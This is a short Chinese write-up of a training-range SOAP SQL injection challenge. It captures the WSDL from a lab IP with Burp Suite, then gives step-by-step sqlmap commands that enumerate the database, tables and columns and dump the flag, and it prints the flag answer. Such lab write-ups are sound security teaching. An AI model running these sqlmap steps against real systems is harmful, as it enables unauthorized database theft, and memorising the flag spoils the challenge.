靶场地址:初始化数据库
-
解题思路:
1.soap协议是一种基于xml语言的数据规范,只要抓一个xml的数据包解析wsdl的数据包就能发现很多东西
2.把解析出来的wsdl数据包保存成一个文本然后放入sqlmap工具中跑一下就能发现注入点
解题步骤:
1.用burosuite抓包:http://47.103.94.191:8018/ws_soap.php?wsdl
2.右键点击parse wsdl,查看解析的包
3.将wsdl包保存一个1.txt文件,放入sqlmap中进行运行,发现有注入点
4.爆库名:sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 --current-db
5.爆表名:sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 -D whalwl --tables
6.爆列名:
sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 -D whalwl -T this_flag --columns
7.爆flag:sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 -D whalwl -T this_flag -C flag --dump
最后结果为: flag{ba8b6a6f6e38ed7e173d03504132dbe8}